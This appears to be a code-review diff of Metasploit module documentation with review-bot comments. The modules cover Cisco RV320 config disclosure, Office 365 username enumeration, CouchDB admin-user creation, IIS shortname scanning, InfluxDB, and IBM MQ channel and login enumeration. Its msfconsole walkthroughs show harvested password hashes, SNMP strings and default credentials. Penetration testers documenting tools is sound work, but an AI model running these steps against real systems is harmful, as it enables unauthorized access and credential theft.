[*] Starting persistent handler(s)...
|
||||
msf5 auxiliary(gather/c2s_dvr_password_disclosure) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type
|
||||
---- ------ ------- ------ ------- ----- ------------
|
||||
127.0.0.1 127.0.0.1 80/tcp (http) admin 12345 Password
|
||||
127.0.0.1 127.0.0.1 80/tcp (http) user 56789 Password
|
||||
```
|
|
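Review bot: the trailing comma on `print $query->header( -type=> "text/javascript"),` in the mock `read.cgi` makes the following `$query->import_names( 'Q' );` a second argument to `print`, so whatever `import_names` returns is printed into the response; end the header line with a semicolon. Two smaller points in the same file: Setup step 3 has a trailing space inside the backticks (`/etc/apache2/sites-enabled/000-default.conf `), and the Verification Steps use triple-backtick inline code while the rest of the doc uses single backticks, so use one style.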
@ -0,0 +1,124 @@
|
|||
## Vulnerable Application
|
||||
|
||||
[CVE-2019-1653](https://nvd.nist.gov/vuln/detail/CVE-2019-1653) (aka Cisco Bugtracker ID [CSCvg85922](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info)) is an unauthenticated disclosure of device configuration information for the Cisco RV320/RV325 small business router. The vulnerability was responsibly disclosed by [RedTeam Pentesting GmbH](https://seclists.org/fulldisclosure/2019/Jan/52).
|
||||
|
||||
An exposed remote administration interface (on :443) would allow an attacker to retrieve password hashes and other sensitive device configuration information. On version `1.4.2.15`, the vulnerabilty is exploitable via the WAN interface on port 8007 (by default) or 443 (if remote administration is enabled), in addition to port 443 on the LAN side. On version `1.4.2.17`, only LAN port 443 is accessible by default, but user configuration can open port 443 for remote management on the WAN side, making the device vulnerable externally.
|
||||
|
||||
More context is available from [Rapid7's blog post](https://blog.rapid7.com/2019/01/29/cisco-r-rv320-rv325-router-unauthenticated-configuration-export-vulnerability-cve-2019-1653-what-you-need-to-know/).
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use auxiliary/gather/cisco_rv320_config`
|
||||
3. `set RHOSTS 192.168.1.1` (default LAN IP) or to the WAN interface
|
||||
4. `run`
|
||||
5. Review the downloaded configuration file cited in the output. For example:
|
||||
>```
|
||||
>[+] Stored configuration (128658 bytes) to /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt
|
||||
>```
|
||||
6. If the database is connected, review the `hosts`, `creds`, and `loot` commands
|
||||
|
||||
## Options
|
||||
|
||||
*SSL*: Should be set to 'true' for port 443 and set to 'false' for port 80 or port 8007.
|
||||
|
||||
*TARGETURI*: Should point to the `/cgi-bin/config.exp` endpoint and likely should never be changed.
|
||||
|
||||
## Scenarios
|
||||
|
||||
#### Against firmware version 1.4.2.15, which on the LAN side, port 443:
|
||||
|
||||
```
|
||||
msf5 >
|
||||
msf5 > use auxiliary/gather/cisco_rv320_config
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
|
||||
RHOSTS => 192.168.1.1
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > run
|
||||
|
||||
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
#### Against firmware version 1.4.2.15, on the WAN side, port 8007:
|
||||
|
||||
```
|
||||
msf5 >
|
||||
msf5 > use auxiliary/gather/cisco_rv320_config
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 172.16.0.34
|
||||
RHOSTS => 192.168.1.1
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set RPORT 8007
|
||||
RPORT => 8007
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set SSL false
|
||||
SSL => false
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > run
|
||||
|
||||
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
#### Against firmware version 1.4.2.17, which on the LAN side, port 443:
|
||||
|
||||
```
|
||||
msf5 >
|
||||
msf5 > use auxiliary/gather/cisco_rv320_config
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
|
||||
RHOSTS => 192.168.1.1
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > run
|
||||
|
||||
[+] Stored configuration (128628 bytes) to /home/administrator/.msf4/loot/20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
#### Against newer firmware (>= 1.4.2.19):
|
||||
|
||||
```
|
||||
msf5 >
|
||||
msf5 > use auxiliary/gather/cisco_rv320_config
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > set RHOSTS 192.168.1.1
|
||||
RHOSTS => 192.168.1.1
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > run
|
||||
|
||||
[-] Auxiliary aborted due to failure: not-vulnerable: Response suggests device is patched
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
#### If module succeeds, check the database:
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > hosts
|
||||
|
||||
Hosts
|
||||
=====
|
||||
|
||||
address mac name os_name os_flavor os_sp purpose info comments
|
||||
------- --- ---- ------- --------- ----- ------- ---- --------
|
||||
172.16.0.34 70:E4:22:94:E7:20 router94e720 Cisco RV320
|
||||
192.168.1.1 70:E4:22:94:E7:20 router94e720 Cisco RV320
|
||||
```
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type
|
||||
---- ------ ------- ------ ------- ----- ------------
|
||||
172.16.0.34 192.168.1.1 8007/tcp (http) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash
|
||||
192.168.1.1 192.168.1.1 443/tcp (https) cisco $1$mldcsfp$gCrnS7A0ta6E5EzwDiZ9t/ Nonreplayable hash
|
||||
```
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/cisco_rv320_config) > loot
|
||||
|
||||
Loot
|
||||
====
|
||||
|
||||
host service type name content info path
|
||||
---- ------- ---- ---- ------- ---- ----
|
||||
172.16.0.34 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt
|
||||
192.168.1.1 cisco.rv.config text/plain /home/administrator/.msf4/loot/20190206211312_default_192.168.1.1_cisco.rv.config_412095.txt
|
||||
```
|
|
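Review bot: the WAN scenario transcript is internally inconsistent: `set RHOSTS 172.16.0.34` is echoed as `RHOSTS => 192.168.1.1`, and the loot line that follows names `192.168.1.1` with the same timestamp and size (`20190206165015_default_192.168.1.1_cisco.rv.config_434637.txt`, 128628 bytes) as the LAN run, while the later `loot` table shows the 172.16.0.34 capture as `20190206213439_default_172.16.0.34_cisco.rv.config_791561.txt` (128658 bytes). Re-capture that run or correct the echoed lines. Minor: 'vulnerabilty' in the first section, and the two headings 'which on the LAN side, port 443' should read 'on the LAN side, port 443'.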
@ -0,0 +1,77 @@
|
|||
External python module compatible with v2 and v3.
|
||||
|
||||
Enumerate valid usernames (email addresses) from Office 365 using ActiveSync.
|
||||
Differences in the HTTP Response code and HTTP Headers can be used to differentiate between:
|
||||
|
||||
- Valid Username (Response code 401)
|
||||
- Valid Username and Password without 2FA (Response Code 200)
|
||||
- Valid Username and Password with 2FA (Response Code 403)
|
||||
- Invalid Username (Response code 404 with Header X-CasErrorCode: UserNotFound)
|
||||
|
||||
Note this behaviour appears to be limited to Office365, MS Exchange does not appear to be affected.
|
||||
|
||||
Microsoft Security Response Center stated on 2017-06-28 that this issue does not "meet the bar for security servicing". As such it is not expected to be fixed any time soon.
|
||||
|
||||
This script is maintaing the ability to run independently of MSF.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Office365's implementation of ActiveSync
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Create a file containing candidate usernames (aka email addresses), one per line.
|
||||
2. Do: ```use auxiliary/gather/office365userenum```
|
||||
3. Do: ```set users [USER_FILE]``` with the file you created.
|
||||
4. Do: ```run```
|
||||
5. Valid and Invalid usernames will be printed out to the screen.
|
||||
|
||||
## Options
|
||||
|
||||
LOGFILE = Output file to use for verbose logging.
|
||||
OUTPUT = Output file for results.
|
||||
PASSWORD = Password to use during enumeration. Note this must exist
|
||||
but does not necessarily need to be valid. If it is
|
||||
found to be valid for an account it will be reported.
|
||||
THREADS = Number of concurrent requests to use during enumeration.
|
||||
TIMEOUT = HTTP request timeout to use during enumeration.
|
||||
URL = URL of Office365 ActiveSync service.
|
||||
USERS = Input fie containing candidate usernames, one per line.
|
||||
VERBOSE = Enable/Disable DEBUG logging
|
||||
|
||||
|
||||
## Scenarios
|
||||
The following demonstrates basic usage, using the supplied users wordlist
|
||||
and default options.
|
||||
|
||||
```
|
||||
msf5 auxiliary(gather/office365userenum) > set users /home/msfdev/users
|
||||
users => /home/msfdev/users
|
||||
msf5 auxiliary(gather/office365userenum) > run
|
||||
|
||||
[*]
|
||||
|
||||
. .1111... | Title: office365userenum.py
|
||||
.10000000000011. .. | Author: Oliver Morton (Sec-1 Ltd)
|
||||
.00 000... | Email: oliverm@sec-1.com
|
||||
1 01.. | Description:
|
||||
.. | Enumerate valid usernames from Office 365 using
|
||||
.. | ActiveSync.
|
||||
GrimHacker .. | Requires: Python 2.7 or 3.6, python-requests
|
||||
.. |
|
||||
grimhacker.com .. |
|
||||
@grimhacker .. |
|
||||
----------------------------------------------------------------------------
|
||||
This program comes with ABSOLUTELY NO WARRANTY.
|
||||
This is free software, and you are welcome to redistribute it
|
||||
under certain conditions. See GPLv2 License.
|
||||
----------------------------------------------------------------------------
|
||||
|
||||
[+] 401 VALID_USER valid_username@example.com:Password1
|
||||
[-] 404 INVALID_USER invalid_username@example.com:Password1
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## References
|
||||
https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/
|
|
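Review bot: the Verification Steps and Scenarios use `set users` while the Options list names the option `USERS`, and PASSWORD is never set in the walkthrough even though the output shows `Password1` being sent with every candidate (`[+] 401 VALID_USER valid_username@example.com:Password1`); show `set PASSWORD` or state its default so readers know which password is tried against every account. Typos: 'maintaing' should be 'maintaining' and 'Input fie' should be 'Input file'. The banner in the transcript says 'Requires: Python 2.7 or 3.6' while the first line says 'compatible with v2 and v3'; align the two.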
@ -20,54 +20,77 @@ The following was done on Ubuntu 16.04, and is largely base on [1and1.com](https
|
|||
|
||||
## Options
|
||||
|
||||
**serverinfo**
|
||||
**SERVERINFO**
|
||||
|
||||
If set to true, the server info will also enumerated and set in msf's DB. Defaults to `false`
|
||||
If set to `true`, the server info will also enumerated and set in msf's DB. Defaults to `false`.
|
||||
|
||||
**CREATEUSER**
|
||||
|
||||
If set to `true`, the server info will attempt to create an account in CouchDB using configured credentials (limited to CVE-2017-12635 conditions). Defaults to `false`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
A run against the configuration from these docs
|
||||
Dumping databases with `SERVERINFO` and `CREATEUSER` set:
|
||||
|
||||
```
|
||||
msf5 auxiliary(scanner/afp/afp_login) > use auxiliary/scanner/couchdb/couchdb_enum
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 1.1.1.1
|
||||
rhosts => 1.1.1.1
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set verbose true
|
||||
verbose => true
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > run
|
||||
```
|
||||
msf5 > use auxiliary/scanner/couchdb/couchdb_enum
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > options
|
||||
|
||||
[+] 1.1.1.1:5984 {
|
||||
"couchdb": "Welcome",
|
||||
"uuid": "6f08e89795bd845efc6c2bf3d57799e5",
|
||||
"version": "1.6.1",
|
||||
"vendor": {
|
||||
"version": "16.04",
|
||||
"name": "Ubuntu"
|
||||
}
|
||||
Module options (auxiliary/scanner/couchdb/couchdb_enum):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CREATEUSER false yes Create Administrative user
|
||||
HttpPassword IJvoGDWAWzQo yes CouchDB Password
|
||||
HttpUsername CQuXQnVwQAow yes CouchDB Username
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target address range or CIDR identifier
|
||||
ROLES _admin yes CouchDB Roles
|
||||
RPORT 5984 yes The target port (TCP)
|
||||
SERVERINFO false yes Print server info
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI /_all_dbs yes Path to list all the databases
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set serverinfo true
|
||||
serverinfo => true
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set createuser true
|
||||
createuser => true
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > set verbose true
|
||||
verbose => true
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > check
|
||||
|
||||
[+] 127.0.0.1:5984 - Found CouchDB version 2.1.0
|
||||
[*] 127.0.0.1:5984 - The target appears to be vulnerable.
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > run
|
||||
|
||||
[+] 127.0.0.1:5984 - Found CouchDB version 2.1.0
|
||||
[+] 127.0.0.1:5984 - User CQuXQnVwQAow created with password IJvoGDWAWzQo. Connect to http://127.0.0.1:5984/_utils/ to login.
|
||||
[+] 127.0.0.1:5984 - {
|
||||
"couchdb": "Welcome",
|
||||
"version": "2.1.0",
|
||||
"features": [
|
||||
"scheduler"
|
||||
],
|
||||
"vendor": {
|
||||
"name": "The Apache Software Foundation"
|
||||
}
|
||||
[*] #{peer} Enumerating Databases...
|
||||
[+] 1.1.1.1:5984 Databases:
|
||||
}
|
||||
[*] 127.0.0.1:5984 - Enumerating Databases...
|
||||
[+] 127.0.0.1:5984 - Databases:
|
||||
|
||||
[
|
||||
"_replicator",
|
||||
"_users"
|
||||
]
|
||||
[
|
||||
"_global_changes",
|
||||
"_replicator",
|
||||
"_users"
|
||||
]
|
||||
|
||||
[+] 1.1.1.1:5984 File saved in: /root/.msf4/loot/20180721105522_default_1.1.1.1_couchdb.enum_888970.bin
|
||||
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) > services
|
||||
Services
|
||||
========
|
||||
|
||||
host port proto name state info
|
||||
---- ---- ----- ---- ----- ----
|
||||
1.1.1.1 5984 tcp couchdb open HTTP/1.1 200 OK
|
||||
Server: CouchDB/1.6.1 (Erlang OTP/18)
|
||||
Date: Sat, 21 Jul 2018 14:54:45 GMT
|
||||
Content-Type: text/plain; charset=utf-8
|
||||
Content-Length: 127
|
||||
Cache-Control: must-revalidate
|
||||
|
||||
{"couchdb":"Welcome","uuid":"6f08e89795bd845efc6c2bf3d57799e5","version":"1.6.1","vendor":{"version":"16.04","name":"Ubuntu"}}
|
||||
|
||||
```
|
||||
[+] 127.0.0.1:5984 - File saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb.enum_790231.bin
|
||||
[+] 127.0.0.1:5984 - _global_changes saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._global__841794.bin
|
||||
[+] 127.0.0.1:5984 - _replicator saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._replica_022445.bin
|
||||
[+] 127.0.0.1:5984 - _users saved in: /Users/wvu/.msf4/loot/20190107125002_default_127.0.0.1_couchdb._users_671128.bin
|
||||
[*] Auxiliary module execution completed
|
||||
msf5 auxiliary(scanner/couchdb/couchdb_enum) >
|
||||
```
|
||||
|
|
|
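Review bot: the CREATEUSER description reads 'the server info will attempt to create an account', copied from the SERVERINFO entry; it should say the module will attempt to create an administrative user with `HttpUsername`/`HttpPassword` and the `ROLES` value (`_admin`). Since the transcript shows `User CQuXQnVwQAow created with password IJvoGDWAWzQo`, the docs should also state that CREATEUSER makes a persistent change on the target that has to be cleaned up afterwards. The replaced output line `[*] #{peer} Enumerating Databases...` shows `#{peer}` was never interpolated in the old module; worth mentioning in the PR description as a fix this change carries.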
@ -0,0 +1,47 @@
|
|||
## Description
|
||||
|
||||
This module scans for the presence of the HTTP interface for a cisco device and attempts to enumerate it using basic authentication.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Any Cisco networking device with the HTTP inteface turned on.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Enable the web interface on a cisco device `ip http server`
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/http/cisco_device_manager```
|
||||
4. Do: ```set RHOSTS [IP]```
|
||||
5. Do: ```run```
|
||||
|
||||
## Options
|
||||
|
||||
**HttpUsername**
|
||||
|
||||
Username to use for basic authentication. Default value is `cisco`
|
||||
|
||||
**HttpPassword**
|
||||
|
||||
Password to use for basic authentication. Default value is `cisco`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Tested on Cisco UC520-8U-4FXO-K9 running IOS 12.4
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/http/cisco_device_manager
|
||||
msf5 auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2
|
||||
rhosts => 2.2.2.2
|
||||
msf5 auxiliary(scanner/http/cisco_device_manager) > set vebose true
|
||||
vebose => true
|
||||
msf5 auxiliary(scanner/http/cisco_device_manager) > run
|
||||
|
||||
[+] 2.2.2.2:80 Successfully authenticated to this device
|
||||
[+] 2.2.2.2:80 Processing the configuration file...
|
||||
[+] 2.2.2.2:80 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
|
||||
[+] 2.2.2.2:80 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
|
||||
[+] 2.2.2.2:80 SNMP Community (RO): public
|
||||
[+] 2.2.2.2:80 ePhone Username 'phoneone' with Password: 111111
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
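Review bot: the transcript sets `vebose` rather than `verbose` (`set vebose true` / `vebose => true`), so verbose mode was never enabled in the captured run; fix the command or re-capture. Typo 'inteface' in Vulnerable Application. The Description says the module 'attempts to enumerate it using basic authentication', but the output shows it retrieves and parses the running configuration (enable secret hash, user hashes, SNMP community, ePhone credentials); say so explicitly, and note that `cisco`/`cisco` is what is tried unless HttpUsername/HttpPassword are changed.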
@ -0,0 +1,63 @@
|
|||
|
||||
## Microsoft IIS shortname vulnerability scanner
|
||||
|
||||
The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install IIS (default installations are vulnerable)
|
||||
2. Start msfconsole
|
||||
3. Check:
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/http/iis_shortname_scanner
|
||||
msf auxiliary(iis_shortname_scanner) > set 172.16.249.128
|
||||
msf auxiliary(iis_shortname_scanner) > check
|
||||
[+] 172.16.249.128:80 The target is vulnerable.
|
||||
```
|
||||
|
||||
4. Scan:
|
||||
|
||||
```
|
||||
msf auxiliary(iis_shortname_scanner) > run
|
||||
[*] Scanning in progress...
|
||||
[+] Directories found
|
||||
http://172.16.249.128/aspnet~1
|
||||
http://172.16.249.128/secret~1
|
||||
[+] Files found
|
||||
http://172.16.249.128/web~1.con
|
||||
http://172.16.249.128/index~1.htm
|
||||
http://172.16.249.128/upload~1.asp
|
||||
http://172.16.249.128/upload~2.asp
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
```
|
||||
Module options (auxiliary/scanner/http/iis_shortname_scanner):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
PATH / yes The base path to start scanning from
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOST yes The target address
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
VHOST no HTTP server virtual host
|
||||
```
|
||||
|
||||
## Remediation
|
||||
|
||||
Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
|
||||
* https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability
|
|
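Review bot: the check transcript has `set 172.16.249.128` with no option name; it should be `set RHOST 172.16.249.128`, and since the options table lists `RHOST` rather than `RHOSTS`, the Verification Steps should include that step. A period is missing after '(GET request)' in the first paragraph. In Remediation, `NtfsDisable8dot3NameCreation` is a value under the `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem` key, not a key itself, and because its name refers to creation the docs should say whether files that already have short names remain exposed after it is set.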
@ -0,0 +1,46 @@
|
|||
This module enumerates databases on InfluxDB using the REST API using the default authentication of root:root.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/http/influxdb_enum```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [PORT]```
|
||||
4. Do: ```run```
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 > use auxiliary/scanner/http/influxdb_enum
|
||||
msf5 auxiliary(scanner/http/influxdb_enum) > set RHOST 172.25.65.20
|
||||
RHOST => 172.25.65.20
|
||||
msf5 auxiliary(scanner/http/influxdb_enum) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf5 auxiliary(scanner/http/influxdb_enum) > run
|
||||
|
||||
[+] 172.25.65.20:8086 - Influx Version: 1.5.1
|
||||
[+] 172.25.65.20:8086 - Influx DB Found:
|
||||
|
||||
{
|
||||
"results": [
|
||||
{
|
||||
"statement_id": 0,
|
||||
"series": [
|
||||
{
|
||||
"name": "databases",
|
||||
"columns": [
|
||||
"name"
|
||||
],
|
||||
"values": [
|
||||
[
|
||||
"_internal"
|
||||
]
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
}
|
||||
|
||||
[+] File saved in: /Users/unix/.msf4/loot/20180423050119_default_172.25.65.20_influxdb.enum_623871.txt
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
|
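Review bot: the transcript uses `set RHOST 172.25.65.20` while step 2 says `set RHOSTS [IP]`; make them consistent, as this is a scanner module. The opening sentence repeats 'using' ('using the REST API using the default authentication') and states the default credentials `root:root` without an Options section naming the options that carry them; add one so a reader knows how to supply other credentials. The loot line `[+] File saved in:` lacks the `host:port -` prefix the other output lines use.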
@ -0,0 +1,48 @@
|
|||
|
||||
## Vulnerable Application
|
||||
|
||||
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
|
||||
* Tested on IBM MQ 7.5, 8 and 9
|
||||
* Usage:
|
||||
* Download and install MQ Server
|
||||
* Create a new Queue Manager
|
||||
* Create a new channel (without SSL)
|
||||
* Run the module
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install IBM MQ Server 7.5, 8, or 9
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
4. Do: ```set channels_file <channel_list_file>```
|
||||
5. Do: ```set rhosts <target_IP>```
|
||||
6. Do: ```set rport <port>```
|
||||
7. Do: ```run```
|
||||
|
||||
Example output:
|
||||
```
|
||||
msf auxiliary(scanner/misc/ibm_mq_channel_brute) > run
|
||||
|
||||
[*] 10.1.1.144:1414 - Found channel: TEST.CHANNEL, IsEncrypted: False, IsMQI: True
|
||||
[*] 10.1.1.144:1414 - Found channel: SYSTEM.ADMIN.SVRCONN, IsEncrypted: False, IsMQI: True
|
||||
|
||||
[+] 10.1.1.144:1414 - Channels found: ["TEST.CHANNEL", "SYSTEM.ADMIN.SVRCONN"]
|
||||
[+] 10.1.1.144:1414 - Unencrypted MQI Channels found: ["TEST.CHANNEL", "SYSTEM.ADMIN.SVRCONN"]
|
||||
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
**The CHANNELS_FILE option**
|
||||
|
||||
This option should contain the path to a text file which contains a list of channel names that will be checked. One channel name per line.
|
||||
|
||||
## Scenarios
|
||||
|
||||
This module can be used to identify a list of channel names that are configured on the Queue Manager. Additionally, the module will return whether each identified channel uses SSL and if it MQI type.
|
||||
After obtaining a list of valid channel names, these can be used to further enumerate the MQ installation. For example, the ibm_mq_enum module can be executed using a valid channel name in order to obtain information regarding the Queue Manager.
|
|
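Review bot: 'Example steps in this format (is also in the PR):' is left over from the docs template and should be removed. In Scenarios, 'if it MQI type' should read 'whether it is an MQI channel'. The steps tell the reader to `set rport <port>`, but the transcript uses 1414; state that 1414 is the default so the step is only needed for non-default listeners. The `IsEncrypted: False, IsMQI: True` fields in the output deserve a sentence, since they decide which channels the follow-on `ibm_mq_enum` and `ibm_mq_login` modules can use.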
@ -0,0 +1,36 @@
|
|||
## Vulnerable Application
|
||||
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
|
||||
* Tested on IBM MQ 7.5, 8 and 9
|
||||
* Usage:
|
||||
* Download and install MQ Server
|
||||
* Create a new Queue Manager
|
||||
* Create a new channel (without SSL)
|
||||
* Run the module
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
1. Install IBM MQ Server 7.5, 8, or 9
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/misc/ibm_mq_enum```
|
||||
4. Do: ```set channel <channel_name>```
|
||||
5. Do: ```set rhosts <target_IP>```
|
||||
6. Do: ```set rport <port>```
|
||||
7. Do: ```run```
|
||||
|
||||
Example output:
|
||||
```
|
||||
msf auxiliary(scanner/misc/ibm_mq_enum) > run
|
||||
|
||||
[+] 10.1.1.144: - 10.1.1.144:1414 - Queue Manager Name: TESTQM - MQ Version: 9.1.0.0
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
|
||||
```
|
||||
|
||||
## Options
|
||||
**The CHANNEL option**
|
||||
|
||||
This option should contain the name of a valid MQ channel. This can be obtained using the module ```auxiliary/scanner/misc/ibm_mq_channel_brute```
|
||||
|
||||
## Scenarios
|
||||
This module can be used to obtain the Queue Manager name as well as the version of the MQ being used on the target host. When the Queue Manager name and a valid MQI channel name without SSL is known , the module ```auxiliary/scanner/misc/ibm_mq_login``` can be used to identify usernames that can authenticate to the Queue Manager.
|
|
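Review bot: the same template leftover 'Example steps in this format (is also in the PR):' should be removed here, and 'is known ,' has a stray space before the comma. The output line `[+] 10.1.1.144: - 10.1.1.144:1414 - Queue Manager Name: TESTQM - MQ Version: 9.1.0.0` prints the host twice, once without the port; check the print call in the module rather than documenting that output as-is.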
@ -0,0 +1,53 @@
|
|||
## Vulnerable Application
|
||||
|
||||
* IBM Downloads page: https://developer.ibm.com/messaging/mq-downloads/
|
||||
* Tested on IBM MQ 7.5, 8 and 9
|
||||
* Usage:
|
||||
* Download and install MQ Server from the above link
|
||||
* Create a new Queue Manager
|
||||
* Create a new channel (without SSL)
|
||||
* Allow remote connections for admin users by removing the CHLAUTH record that denies all users or configure access for a specific username.
|
||||
* Run the module
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
1. Install IBM MQ Server 7.5, 8, or 9
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/scanner/misc/ibm_mq_login```
|
||||
4. Do: ```set channel <admin_channel_name_without_ssl>```
|
||||
5. Do: ```set queue_manager <queue_manager_name>```
|
||||
5. Do: ```set usernames_file <list_of_usernames>```
|
||||
6. Do: ```set rhosts <target_IP>```
|
||||
7. Do: ```set rport <port>```
|
||||
8. Do: ```run```
|
||||
|
||||
Example output:
|
||||
```
|
||||
msf auxiliary(scanner/misc/ibm_mq_login) > run
|
||||
|
||||
[*] 10.1.1.10:1416 - Found username: admin
|
||||
[*] 10.1.1.10:1416 - Found username: test
|
||||
|
||||
[+] 10.1.1.10:1416 - 10.1.1.10:1416 Valid usernames found: ["admin", "test"]
|
||||
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
## Options
|
||||
**The USERNAMES_FILE option**
|
||||
|
||||
This option should contain the path to a text file which contains a list of usernames that will be checked. One username per line.
|
||||
|
||||
**The QUEUE_MANAGER option**
|
||||
|
||||
This option should contain the name of the target Queue Manager.
|
||||
|
||||
**The CHANNEL option**
|
||||
|
||||
This option should contain the name of a server-connection channel that will be used to connect to the Queue Manager.
|
||||
|
||||
## Scenarios
|
||||
